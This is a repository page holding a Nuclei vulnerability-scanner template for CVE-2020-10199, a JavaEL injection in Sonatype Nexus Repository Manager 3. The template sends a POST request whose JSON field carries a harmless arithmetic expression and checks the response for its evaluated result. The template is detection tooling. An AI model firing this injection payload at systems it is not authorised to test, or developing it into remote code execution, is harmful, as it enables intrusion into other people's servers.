daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/cves/CVE-2020-10199.yaml

28 lines
839 B
YAML
Raw Blame History

id: cve-2020-10199
info:
name: Nexus Repository Manager 3 RCE
author: hetroublemakr
severity: high
description: Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection (issue 1 of 2).
# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
requests:
- method: POST
path:
- '{{BaseURL}}/rest/beta/repositories/go/group'
headers:
Content-Type: application/json
body: '{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ 1337 * 1337 }"]}}'
matchers-condition: and
matchers:
- type: word
words:
- "1787569"
part: body
- type: status
status:
- 400
Reference in New Issue View Git Blame Copy Permalink